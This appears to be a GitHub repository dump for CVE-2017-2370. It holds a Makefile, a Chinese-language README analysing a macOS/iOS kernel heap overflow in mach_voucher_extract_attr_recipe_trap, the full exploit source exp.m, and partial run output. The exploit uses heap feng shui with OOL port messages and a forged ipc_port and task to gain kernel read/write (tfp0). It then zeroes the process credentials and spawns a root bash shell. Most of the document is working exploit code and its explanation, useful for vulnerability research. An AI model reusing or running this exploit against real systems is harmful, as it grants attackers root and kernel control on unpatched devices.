├── exp ├── Makefile ├── README.md ├── exp.m └── tmp.out /exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Peterpan0927/CVE-2017-2370/HEAD/exp -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | TARGET = exp 2 | 3 | all:$(TARGET) 4 | 5 | CFLAGS = "" 6 | FRAMEWORKS = -framework IOKit -framework Foundation -framework CoreFoundation 7 | 8 | $(TARGET): exp.m 9 | clang $(CFLAGS) $(FRAMEWORKS) -pagezero_size 0x16000 $^ -o $@ 10 | clean: 11 | rm -f -- $(TARGET) 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 0x00.前言 2 | 3 | 这次提权利用的是`mach_voucher_extract_attr_recipe_trap`存在的一个漏洞,而利用方法的核心就是通过`MACH_MSG_OOL_PORTS_DESCRIPTOR`消息。 4 | 5 | 关于`mach_msg ool`简单来说当发送一个包含`ool descriptor`的`msg`时,内核会将指定的数据从用户空间复制到内核空间,并且内核会一直保持这部分数据,直到目标 task 处理了消息。同样,当目标进程接收一个包含`ool descriptor`的消息时,内核会将数据从内核空间复制到用户空间(不一定是真正的复制)。因此可以利用这个技术点向内核堆中写入数据或者从内核读取数据。 6 | 7 | 由于这个漏洞的利用比三叉戟要复杂得多,所以我就一步步的慢慢去剖析了,从漏洞的产生点到一步步的利用,代码可以参考我的[github](https://github.com/Peterpan0927/CVE-2017-2370) 8 | 9 | # 0x01.漏洞产生点 10 | 11 | 在iOS 10和macOS 10.12中添加的新功能中有一个函数叫做`mach_voucher_extract_attr_recipe_trap`,是一个可以在沙盒内调用的`Mach trap`,下面是这个函数的源代码: 12 | 13 | ```c 14 | kern_return_t 15 | mach_voucher_extract_attr_recipe_trap(struct mach_voucher_extract_attr_recipe_args *args) 16 | { 17 | ipc_voucher_t voucher = IV_NULL; 18 | kern_return_t kr = KERN_SUCCESS; 19 | mach_msg_type_number_t sz = 0; 20 | //将recipe_size的地址拷贝到sz中,此时sz存放的就是kalloc_size的值了 21 | if (copyin(args->recipe_size, (void *)&sz, sizeof(sz))) <---------- (a) 22 | return KERN_MEMORY_ERROR; 23 | 24 | if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE) 25 | return MIG_ARRAY_TOO_LARGE; 26 | 27 | voucher = convert_port_name_to_voucher(args->voucher_name); 28 | if (voucher == IV_NULL) 29 | return MACH_SEND_INVALID_DEST; 30 | 31 | mach_msg_type_number_t __assert_only max_sz = sz; 32 | 33 | if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) { 34 | /* keep small recipes on the stack for speed */ 35 | uint8_t krecipe[sz]; 36 | if (copyin(args->recipe, (void *)krecipe, sz)) { 37 | kr = KERN_MEMORY_ERROR; 38 | goto done; 39 | } 40 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 41 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 42 | assert(sz <= max_sz); 43 | 44 | if (kr == KERN_SUCCESS && sz > 0) 45 | kr = copyout(krecipe, (void *)args->recipe, sz); 46 | } else { 47 | uint8_t *krecipe = kalloc((vm_size_t)sz); <---------- (b) 48 | if (!krecipe) { 49 | kr = KERN_RESOURCE_SHORTAGE; 50 | goto done; 51 | } 52 | 53 | if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) { <----------- (c) 54 | kfree(krecipe, (vm_size_t)sz); 55 | kr = KERN_MEMORY_ERROR; 56 | goto done; 57 | } 58 | 59 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 60 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 61 | assert(sz <= max_sz); 62 | 63 | if (kr == KERN_SUCCESS && sz > 0) 64 | kr = copyout(krecipe, (void *)args->recipe, sz); 65 | kfree(krecipe, (vm_size_t)sz); 66 | } 67 | 68 | kr = copyout(&sz, args->recipe_size, sizeof(sz)); 69 | 70 | done: 71 | ipc_voucher_release(voucher); 72 | return kr; 73 | } 74 | ``` 75 | 76 | 1. 通过分析我们可以知道在a点的时候4byte的用户空间指针`args->recipe_size`被写到`sz`中 77 | 2. 在b点的时候,如果`sz`的大小在`MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120)`和`MACH_VOUCHER_TRAP_STACK_LIMIT (256)`之间的话,就会按照`sz`的值去分配一个内核堆缓冲区 78 | 3. 在c点的时候将用户空间的内存拷贝到刚刚分配的区域,但是传递的拷贝的大小并不是用来分配内核堆的`sz`,而是一个用户空间指针,于是乎就会产生一个堆溢出,我们正是利用这个点进行攻击,并且`copyin`函数有一个特性就是遇到`unmap`的页面就是停止拷贝,这个特性将会在我们的`poc`中得到利用: 79 | 80 | ![copyin](http://omunhj2f1.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202018-07-31%20%E4%B8%8A%E5%8D%8811.42.17.png) 81 | 82 | # 0x01.利用步骤 83 | 84 | 1. 首先我们要使堆空间可控,这里我们用到的技术是堆风水,因为在`freelist`随机化之后,我们并不知道重新分配的内存块的位置了。 85 | 86 | 先需要了解mach msg中对`MACH_MSG_OOL_PORTS_DESCRIPTOR`的处理 ,内核收到复杂消息后发现是`ports descriptor`后会交给(called by `ipc_kmsg_copyin`)`ipc_kmsg_copyin_ool_ports_descriptor`函数读取所有的`port`对象。该函数会调用`kalloc`分配需要的内存(64位下分配的内存是输入的2倍,name的长度是4字节),然后将有效的`port`由`name`转换成真实的`ipc_port`对象地址保存,对于输入是`MACH_PORT_NULL或者MACH_PORT_DEAD`的`name`,会保持不变。 87 | 88 | ```c 89 | /* calculate length of data in bytes, rounding up */ 90 | if (os_mul_overflow(count, sizeof(mach_port_t), &ports_length)) { 91 | *mr = MACH_SEND_TOO_LARGE; 92 | return NULL; 93 | } 94 | 95 | if (os_mul_overflow(count, sizeof(mach_port_name_t), &names_length)) { 96 | *mr = MACH_SEND_TOO_LARGE; 97 | return NULL; 98 | } 99 | 100 | if(ports_length == 0){ 101 | return user_desc; 102 | } 103 | 104 | data = kalloc(ports_length); // 分配空间 105 | ... 106 | objects = (ipc_object_t *) data; 107 | 108 | dsc->address = data; 109 | 110 | for ( i = 0; i < count; i++) { 111 | mach_port_name_t name = names[i]; 112 | ipc_object_t object; 113 | if (!MACH_PORT_VALID(name)) { 114 | objects[i] = (ipc_object_t)CAST_MACH_NAME_TO_PORT(name);// IPC_PORT_DEAD continue; 115 | } 116 | ... 117 | } 118 | ``` 119 | 所以攻击的时候我们会发送大量的`MACH_PORT_DEAD`,将内存区域填充为`0xFFFFFFFFFFFFFFFF`(`MACH_PORT_DEAD`),然后触发漏洞,将其中一个`IPC_PORT_DEAD`修改为攻击者布置好的一块内存区域,如果指向的区域是一个合法的`ipc port`结构,那么在接受`OOL PORTS`消息后,就能够在用户空间得到这个`ipc_port`对应的`port name`,进行下一步攻击。 120 | 121 | ![堆风水](http://omunhj2f1.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202018-07-28%20%E4%B8%8B%E5%8D%884.48.43.png) 122 | 123 | 124 | 125 | 2. `ipc_object`对象的构造 126 | 127 | 首先我们已经得到了这个`fake port`,接下来要进行信息泄漏就必须知道内核会根据那些参数来对它进行不同的处理,首先看看`ipc_port`的结构体 128 | 129 | ```c 130 | struct ipc_port { 131 | //ipc_object的指针就在前八个字节,是我们溢出攻击的对象 132 | struct ipc_object ip_object; // port对象的类型 struct ipc_mqueue,ip_messages; 133 | struct ipc_mqueue ip_messages; //消息队列 134 | union { 135 | struct ipc_space *receiver; 136 | struct ipc_port *destination; 137 | ipc_port_timestamp_t timestamp; 138 | }data; 139 | union { 140 | ipc_importance_task_t imp_task; 141 | ipc_kobject_t kobject; // port对应的内核对象 142 | uintptr_t alias; 143 | }kdata; 144 | ... 145 | } __attribute__((__packed__)); 146 | ``` 147 | 148 | 其中有一个port对应的内核对象,而这个`ipc_port`对应的到底是哪种类型的内核对象则是由`ipc_object`的属性来决定了,所以我们其实是针对`ipc_object`进行构造。 149 | 150 | ```c 151 | fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; //设置为IKOT_CLOCK对象,并处于激活状态 152 | fakeport->io_lock_data[12] = 0x11; //设置port锁处于活动状态,防止死锁 153 | ``` 154 | 155 | 内核就会将这个`ipc_port`认作是用于`IKOT_CLOCK`对象通信的`port`,接下来的目的就是来泄漏内核基址: 156 | 157 | 将这个ipc_port伪造为`IKOT_CLOCK`对象,然后将其 kdata.kobject指针设置为一个内核地址。每次修改这个内核地址后,在用户空间调用`clock_sleep_trap`,内核中会调用`port_name_to_clock`得到这个内核地址, 并将其作为clock参数传 递给`clock_sleep_internal`,源码如下: 158 | 159 | ```c 160 | static kern_return_t clock_sleep_internal( clock_t clock, sleep_type_t sleep_type, mach_timespec_t *sleep_time) 161 | { 162 | if (clock == CLOCK_NULL) 163 | return (KERN_INVALID_ARGUMENT); 164 | if (clock != &clock_list[SYSTEM_CLOCK]) 165 | return (KERN_FAILURE); 166 | ... 167 | } 168 | ``` 169 | 170 | 从上面的代码中可以看出如果`clock` 的地址不是`clock_list[SYSTEM_CLOCK]`的地址,就会返回`KERN_FAILURE`,否则就会返回其他的地址,那么我们就可以通过返回的参数,去做遍历(不停修改kobject的值),直到返回`KERN_FAILURE`为止,那么我们就可以拿到`clock_list[SYSTEM_CLOCK]`在内核中的地址了,而这个地址又不在堆上,而是内核中的一个全局变量,处在一个特定的偏移。接下来就是从这个地方开始往前读每一个页面的头部,找到`MH_MAGIC_64`,也就是`0xfeedfacf`。 171 | 172 | ```c 173 | extern struct clock_ops sysclk_ops, calend_ops; 174 | 175 | struct clock clock_list[] = { 176 | {&sysclk_ops, 0, 0}, 177 | {&calend_ops, 0, 0} 178 | }; 179 | ``` 180 | 181 | 182 | 183 | 3. 内核任意地址读 184 | 185 | 在我们拿到了这个地址之后,就需要将我们的对象转换为`task`类型,并且找到内核的基址,这样就可以算出`kslide`,进行接下来的`tfp0`操作。 186 | 187 | ```c 188 | //将fake port的类型换成task,因为需要利用pid_for_task这个接口来进行任意地址读 189 | fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; 190 | fakeport->io_references = 0xff; 191 | char* faketask = ((char*)fakeport) + 0x1000; 192 | 193 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 194 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 195 | *(uint64_t*) (faketask + 0x10) = 0xee; 196 | ``` 197 | 198 | 拿到`kobject`的地址,跳到页面开头,在`Yalu102`和`Zheng min`的Poc中对于这个操作的先后是不同的,但是这个并不影响,因为`faketask`的地址同样在这个页面上,所以进行一次与操作都会得到页面的起始地址。 199 | 200 | ```c 201 | uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); 202 | leaked_ptr &= ~0x3FFF; 203 | ``` 204 | 205 | 然后就写一个死循环去找`MH_MAGIC_64`,然后进行我们的`tfp0`阶段: 206 | 207 | ```c 208 | while (1) { 209 | int leaked = 0; 210 | *(uint64_t *)(faketask + 0x380) = leaked_ptr -0x10; 211 | pid_for_task(foundport, &leaked); 212 | if (leaked == MH_MAGIC_64) { 213 | printf("found kernel text at 0x%llx\n", leaked_ptr); 214 | break; 215 | } 216 | //往前一个页面 217 | leaked_ptr -= 0x4000; 218 | } 219 | ``` 220 | 221 | 只要为什么可以实现任意地址读,这个是因为`pid_for_task`这个函数的值没有做任何的判断,只是将传进来的参数转换成地址做一些加减运算: 222 | 223 | ```c 224 | kern_return_t pid_for_task(struct pid_for_task_args *args){ 225 | mach_port_t t = args->t; 226 | ... 227 | t1 = port_name_to_task(t); 228 | p = get_bsdtask_info(t1); 229 | if(p){ 230 | pid = proc_id(p); 231 | err = KERN_SUCCESS; 232 | } 233 | ... 234 | (void) copyout((char *)&pid, pid_addr, sizeof(int)); 235 | AUDIT_MACH_SYSCALL_EXIT(err); 236 | return err; 237 | } 238 | 239 | //pid_for_task_args 240 | struct pid_for_task_args{ 241 | PAD_ARG(mach_port_name_t t); 242 | PAD_ARG(user_addr_r pid); 243 | }; 244 | ``` 245 | 246 | ![pid_for_task](http://omunhj2f1.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202018-07-30%20%E4%B8%8B%E5%8D%882.41.22.png) 247 | 248 | 249 | 250 | 4. tfp0 251 | 252 | 整个的流程就是找到内核的进程链表,遍历找到自己的进程的地址和`pid0`的地址。然后根据内核进程拿到`kernel task`的地址,再从`kernel task`中获取`itk_sself(kernel task's port)`,然后将`kernel task`的信息覆盖我们伪造的`ipc port`的信息,再将`fake port`指向伪造的`kernel task `,把`kernel task`的`bootstrap port`设置为真实的`kernel task`的port,然后就可以通过接口`task_get_special_port`拿到`kernel task`的`port`,从而实现任意地址读写,把我们自己的`proc`权限改写成`root`。 253 | 254 | ```c 255 | uint64_t kern_task = 0; 256 | kr32(kernproc+0x18, (int32_t*)&kern_task); 257 | kr32(kernproc+0x18+4 , (int32_t*)(((uint64_t)(&kern_task)) + 4)); 258 | 259 | uint64_t itk_kern_sself = 0; 260 | kr32(kern_task+0xe8, (int32_t*)&itk_kern_sself); 261 | kr32(kern_task+0xe8+4 , (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); 262 | 263 | char *faketaskport = malloc(0x1000); 264 | char *ktaskdump = malloc(0x1000); 265 | 266 | for (int i = 0; i < 0x1000/4; i++) { 267 | kr32(itk_kern_sself+i*4, (int32_t*)(&faketaskport[i*4])); 268 | } 269 | 270 | for (int i = 0; i < 0x1000/4; i++) { 271 | kr32(kern_task+i*4, (int32_t*)(&ktaskdump[i*4])); 272 | } 273 | 274 | //dump kernel task port 275 | memcpy(fakeport, faketaskport, 0x1000); 276 | memcpy(faketask, ktaskdump, 0x1000); 277 | 278 | 279 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 280 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 281 | 282 | *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself; 283 | 284 | //get kernel task 285 | task_get_special_port(foundport, 4, &tfp0); 286 | printf("tfp0 = 0x%x\n", tfp0); 287 | 288 | fakeport->io_bits = 0; 289 | 290 | uint64_t slide; 291 | slide = kernel_base - 0xFFFFFF8000200000; 292 | 293 | printf("kernel_base=0x%llx slide=0x%llx header=0x%llx\n",kernel_base, slide,ReadAnywhere64(kernel_base)); 294 | 295 | //get root 296 | uint64_t cred = ReadAnywhere64(myproc+0xe8); 297 | WriteAnywhere64(cred+0x18,0); 298 | ``` 299 | 300 | ![pwn](http://omunhj2f1.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202018-07-30%20%E4%B8%8B%E5%8D%885.40.37.png) 301 | 302 | 303 | # 0x02.参考链接 304 | 305 | - [ool msg](https://bbs.pediy.com/thread-201121.htm) 306 | - [project zero](https://bugs.chromium.org/p/project-zero/issues/detail?id=1004) 307 | - [zheng min](https://jaq.alibaba.com/community/art/show?spm=a313e.7916646.24000001.19.eXT850&articleid=781) 308 | - [Yalu102](https://github.com/kpwn/yalu102) 309 | - And thanks for the help of shrek_wzw 310 | 311 | -------------------------------------------------------------------------------- /exp.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #include 6 | #include 7 | 8 | #define kIOMasterPortDefault MACH_PORT_NULL 9 | #define IO_OBJECT_NULL MACH_PORT_NULL 10 | #define MACH_VOUCHER_ATTR_ATM_CREATE ((mach_voucher_attr_recipe_command_t)510) 11 | #define IO_BITS_ACTIVE 0x80000000 12 | #define IKOT_TASK 2 13 | #define IKOT_IOKIT_CONNECT 29 14 | #define IKOT_CLOCK 25 15 | 16 | #define kr32(address, value)\ 17 | *(uint64_t*) (faketask + 0x380) = address - 0x10;\ 18 | pid_for_task(foundport, value); 19 | 20 | typedef struct { 21 | mach_msg_header_t head; 22 | mach_msg_body_t msgh_body; 23 | mach_msg_ool_ports_descriptor_t desc[1]; 24 | char pad[4096]; 25 | } sprz; 26 | 27 | struct ipc_object { 28 | natural_t io_bits; 29 | natural_t io_references; 30 | char io_lock_data[0x100]; 31 | }; 32 | 33 | mach_port_t mport = 0; 34 | mach_port_t tfp0 = 0; 35 | 36 | void copyin(void* to, uint64_t from, size_t size) { 37 | mach_vm_size_t outsize = size; 38 | size_t szt = size; 39 | if (size > 0x1000) { 40 | size = 0x1000; 41 | } 42 | size_t off = 0; 43 | while (1) { 44 | mach_vm_read_overwrite(tfp0, off+from, size, (mach_vm_offset_t)(off+to), &outsize); 45 | szt -= size; 46 | off += size; 47 | if (szt == 0) { 48 | break; 49 | } 50 | size = szt; 51 | if (size > 0x1000) { 52 | size = 0x1000; 53 | } 54 | 55 | } 56 | } 57 | 58 | void copyout(uint64_t to, void* from, size_t size) { 59 | mach_vm_write(tfp0, to, (vm_offset_t)from, (mach_msg_type_number_t)size); 60 | } 61 | 62 | uint64_t ReadAnywhere64(uint64_t addr) { 63 | uint64_t val = 0; 64 | copyin(&val, addr, 8); 65 | return val; 66 | } 67 | 68 | uint64_t WriteAnywhere64(uint64_t addr, uint64_t val) { 69 | copyout(addr, &val, 8); 70 | return val; 71 | } 72 | 73 | uint32_t ReadAnywhere32(uint64_t addr) { 74 | uint32_t val = 0; 75 | copyin(&val, addr, 4); 76 | return val; 77 | } 78 | 79 | uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) { 80 | copyout(addr, &val, 4); 81 | return val; 82 | } 83 | 84 | void unmap(uint64_t addr, uint64_t size) { 85 | kern_return_t err = mach_vm_deallocate(mach_task_self(), addr, size); 86 | if (err != KERN_SUCCESS) { 87 | printf("failed to unmap memory\n"); 88 | } 89 | } 90 | 91 | uint64_t map(uint64_t size) { 92 | uint64_t addr = 0; 93 | kern_return_t err = mach_vm_allocate(mach_task_self(), &addr, size, VM_FLAGS_ANYWHERE); 94 | if (err != KERN_SUCCESS) { 95 | printf("failed to allocate mapping: %s\n", mach_error_string(err)); 96 | } 97 | return addr; 98 | } 99 | 100 | 101 | uint64_t roundup(uint64_t val, uint64_t pagesize) { 102 | val += pagesize - 1; 103 | val &= ~(pagesize - 1); 104 | return val; 105 | } 106 | mach_port_t get_voucher() { 107 | mach_voucher_attr_recipe_data_t r = { 108 | .key = MACH_VOUCHER_ATTR_KEY_ATM, 109 | .command = MACH_VOUCHER_ATTR_ATM_CREATE 110 | }; 111 | static mach_port_t p = MACH_PORT_NULL; 112 | 113 | if (p != MACH_PORT_NULL) { 114 | return p; 115 | } 116 | 117 | kern_return_t err = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&r, sizeof(r), &p); 118 | 119 | if (err != KERN_SUCCESS) { 120 | printf("failed to create voucher (%s)\n", mach_error_string(err)); 121 | } 122 | printf("create voucher = 0x%x\n", p); 123 | 124 | return p; 125 | } 126 | 127 | void do_overflow(uint64_t kalloc_size, uint64_t overflow_length, uint8_t* overflow_data) { 128 | 129 | int pagesize = getpagesize(); 130 | 131 | //void *recipe_size = (void *)map(pagesize); 132 | 133 | uint64_t *recipe_size = &kalloc_size; 134 | 135 | uint64_t actual_copy_size = kalloc_size + overflow_length; 136 | uint64_t roundupnumber = roundup(actual_copy_size, pagesize); 137 | uint64_t alloc_size = roundupnumber + pagesize; 138 | uint64_t base = map(alloc_size); 139 | uint64_t end = base + roundup(actual_copy_size, pagesize); 140 | 141 | unmap(end, pagesize); 142 | 143 | uint64_t start = end - actual_copy_size; 144 | 145 | uint8_t* recipe = (uint8_t*)start; 146 | 147 | memset(recipe, 0x41, kalloc_size); 148 | memcpy(recipe+kalloc_size, overflow_data, overflow_length); 149 | printf("roundupnumber:%llu\nalloc_size:%llu\npagesize:%d\nbase:%llx\nroundupact:%llu\nend:%llx\n", roundupnumber,alloc_size,pagesize,base,roundup(actual_copy_size, pagesize),end); 150 | //trigger the heap overflow! 151 | kern_return_t err = mach_voucher_extract_attr_recipe_trap( mport, 1, recipe, recipe_size); 152 | } 153 | 154 | 155 | int main() 156 | { 157 | //create mach voucher port 158 | mport = get_voucher(); 159 | 160 | //create fake port 161 | struct ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); 162 | printf("fakeport=0x%p\n",fakeport); 163 | 164 | mlock(fakeport, 0x8000); 165 | 166 | fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; 167 | fakeport->io_lock_data[12] = 0x11; 168 | 169 | mach_port_t* ports = calloc(800, sizeof(mach_port_t)); 170 | 171 | for (int i = 0; i < 800; i++) { 172 | mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); 173 | mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); 174 | } 175 | 176 | sprz msg1; 177 | memset(&msg1, 0, sizeof(sprz)); 178 | sprz msg2; 179 | memset(&msg2, 0, sizeof(sprz)); 180 | 181 | mach_port_t* buffer = calloc(0x1000, sizeof(mach_port_t)); 182 | 183 | for (int i = 0; i < 0x1000; i++) { 184 | buffer[i] = MACH_PORT_DEAD; 185 | } 186 | 187 | //init heap fengshui msg 188 | msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX; 189 | msg1.head.msgh_local_port = MACH_PORT_NULL; 190 | msg1.head.msgh_size = sizeof(msg1)-2048; 191 | msg1.msgh_body.msgh_descriptor_count = 1; 192 | msg1.desc[0].address = buffer; 193 | msg1.desc[0].count = 0x100/8; //32 194 | msg1.desc[0].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 195 | msg1.desc[0].disposition = MACH_MSG_TYPE_COPY_SEND; 196 | 197 | // send 1-800 198 | pthread_yield_np(); 199 | for (int i=1; i<800; i++) { 200 | msg1.head.msgh_remote_port = ports[i]; 201 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 202 | assert(kret==0); 203 | } 204 | 205 | // recv 300 - 500 i+=4 206 | pthread_yield_np(); 207 | for (int i = 300; i<500; i+=4) { 208 | msg2.head.msgh_local_port = ports[i]; 209 | kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); 210 | if(!(i < 400)) 211 | ports[i] = 0; 212 | assert(kret==0); 213 | } 214 | 215 | //send 300 - 400 i+=4 216 | pthread_yield_np(); 217 | for (int i = 300; i<400; i+=4) { 218 | msg1.head.msgh_remote_port = ports[i]; 219 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 220 | assert(kret==0); 221 | } 222 | 223 | //heap overflow here,voucher port被释放掉,下面接受不到消息 224 | do_overflow(0x100, 8, (uint8_t*)&fakeport); 225 | 226 | // 300 - 500 find overflow port 227 | mach_port_t foundport = 0; 228 | for (int i=300; i<500; i++) { 229 | if (ports[i]) { 230 | msg1.head.msgh_local_port = ports[i]; 231 | pthread_yield_np(); 232 | kern_return_t kret = mach_msg(&msg1, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); 233 | assert(kret==0); 234 | for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) { 235 | mach_port_t* ptz = msg1.desc[k].address; 236 | for (int z = 0; z < 0x100/8; z++) { 237 | if (ptz[z] != MACH_PORT_DEAD) { 238 | printf("ptz[z]=0x%x\n",ptz[z]); 239 | if (ptz[z]) { 240 | foundport = ptz[z]; 241 | goto foundp; 242 | } 243 | 244 | } 245 | } 246 | } 247 | mach_msg_destroy(&msg1.head); 248 | mach_port_deallocate(mach_task_self(), ports[i]); 249 | ports[i] = 0; 250 | } 251 | } 252 | printf("can't find overflow port.\n"); 253 | return -1; 254 | 255 | // found overflow port 256 | foundp: 257 | 258 | printf("found port!\n"); 259 | 260 | uint64_t textbase = 0xffffff8000200000; 261 | int k; 262 | for (int i = 0; i < 0x300; i++) { 263 | for (k = 0; k < 0x40000; k+=8) { 264 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k; 265 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 266 | 267 | // fakeport->io_bits = IKOT_CLOCK | IO_BITS_ACTIVE ; 268 | kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0); 269 | //printf("%d\t kern_fail\n", kret, KERN_FAILURE); 270 | if (kret != KERN_FAILURE) { 271 | goto gotclock; 272 | } 273 | } 274 | printf("fail, address:%llx\n",textbase + i*0x100000 + 0x500000 + k ); 275 | } 276 | 277 | printf("can't find clock task.\n"); 278 | return -1; 279 | 280 | //found clock task 281 | gotclock: 282 | 283 | printf("found clock\n"); 284 | fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; 285 | fakeport->io_references = 0xff; 286 | char* faketask = ((char*)fakeport) + 0x1000; 287 | 288 | uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); 289 | printf("leaked_ptr:%llx\n", leaked_ptr); 290 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 291 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 292 | *(uint64_t*) (faketask + 0x10) = 0xee; 293 | 294 | //回到页面开头 295 | leaked_ptr &= ~0x3FFF; 296 | printf("clock task ptr = 0x%llx\n",leaked_ptr); 297 | // int leaked = 0; 298 | //kr32(leaked_ptr, &leaked); 299 | // printf("%llx\n", leaked); 300 | while(1){ 301 | int leaked = 0; 302 | *(uint64_t *)(faketask + 0x380) = leaked_ptr - 0x10; 303 | pid_for_task(foundport, &leaked); 304 | printf("leaked:%x\n", leaked); 305 | if (leaked == MH_MAGIC_64) { 306 | printf("found kernel text at 0x%llx\n", leaked_ptr); 307 | break; 308 | } 309 | leaked_ptr -= 0x4000; 310 | } 311 | 312 | //found kernel base 313 | uint64_t kernel_base = leaked_ptr; 314 | 315 | 316 | //0xFFFFFF8000ABC490 _allproc 317 | //0xFFFFFF8000200000 kernel text base 318 | //offset = 0xFFFFFF8000ABC490-0xFFFFFF8000200000 319 | uint64_t allproc_offset = 0x8bc490; 320 | 321 | uint64_t allproc = allproc_offset + kernel_base; 322 | 323 | uint64_t proc_ = allproc; 324 | 325 | uint64_t myproc = 0; 326 | uint64_t kernproc = 0; 327 | 328 | //find kernel proc 329 | while (proc_) { 330 | uint64_t proc = 0; 331 | 332 | kr32(proc_, (int32_t*)&proc); 333 | kr32(proc_+4, (int32_t*)(((uint64_t)(&proc)) + 4)); 334 | 335 | int pd = 0; 336 | 337 | kr32(proc+0x10, (int32_t*)&pd); 338 | 339 | if (pd == getpid()) { 340 | myproc = proc; 341 | } else if (pd == 0){ 342 | kernproc = proc; 343 | } 344 | proc_ = proc; 345 | } 346 | 347 | printf("kernproc:%llx\n", kernproc); 348 | uint64_t kern_task = 0; 349 | kr32(kernproc+0x18, (int32_t*)&kern_task); 350 | kr32(kernproc+0x18+4 , (int32_t*)(((uint64_t)(&kern_task)) + 4)); 351 | uint64_t itk_kern_sself = 0; 352 | kr32(kern_task+0xe8, (int32_t*)&itk_kern_sself); 353 | kr32(kern_task+0xe8+4 , (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); 354 | 355 | char* faketaskport = malloc(0x1000); 356 | char* ktaskdump = malloc(0x1000); 357 | 358 | for (int i = 0; i < 0x1000/4; i++) { 359 | kr32(itk_kern_sself+i*4, (int32_t*)(&faketaskport[i*4])); 360 | } 361 | 362 | for (int i = 0; i < 0x1000/4; i++) { 363 | kr32(kern_task+i*4, (int32_t*)(&ktaskdump[i*4])); 364 | } 365 | 366 | //dump kernel task port 367 | memcpy(fakeport, faketaskport, 0x1000); 368 | memcpy(faketask, ktaskdump, 0x1000); 369 | 370 | 371 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 372 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 373 | 374 | *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself; 375 | 376 | //get kernel task 377 | task_get_special_port(foundport, 4, &tfp0); 378 | 379 | fakeport->io_bits = 0; 380 | 381 | uint64_t slide; 382 | slide = kernel_base - 0xFFFFFF8000200000; 383 | 384 | printf("kernel_base=0x%llx slide=0x%llx header=0x%llx\n",kernel_base, slide,ReadAnywhere64(kernel_base)); 385 | 386 | //get root 387 | uint64_t cred = ReadAnywhere64(myproc+0xe8); 388 | 389 | WriteAnywhere64(cred+0x18,0); 390 | 391 | printf("getuid = %d\n", getuid()); 392 | 393 | //get shell 394 | system("/bin/bash"); 395 | 396 | return 0; 397 | } 398 | 399 | -------------------------------------------------------------------------------- /tmp.out: -------------------------------------------------------------------------------- 1 | create voucher = 0xc03 2 | fakeport=0x0x8414000 3 | roundupnumber:4096 4 | alloc_size:8192 5 | pagesize:4096 6 | base:844f000 7 | roundupact:4096 8 | end:8450000 9 | ptz[z]=0x32d03 10 | found port! 11 | fail, address:ffffff8000740000 12 | fail, address:ffffff8000840000 13 | fail, address:ffffff8000940000 14 | fail, address:ffffff8000a40000 15 | fail, address:ffffff8000b40000 16 | fail, address:ffffff8000c40000 17 | fail, address:ffffff8000d40000 18 | fail, address:ffffff8000e40000 19 | fail, address:ffffff8000f40000 20 | fail, address:ffffff8001040000 21 | fail, address:ffffff8001140000 22 | fail, address:ffffff8001240000 23 | fail, address:ffffff8001340000 24 | fail, address:ffffff8001440000 25 | fail, address:ffffff8001540000 26 | fail, address:ffffff8001640000 27 | fail, address:ffffff8001740000 28 | fail, 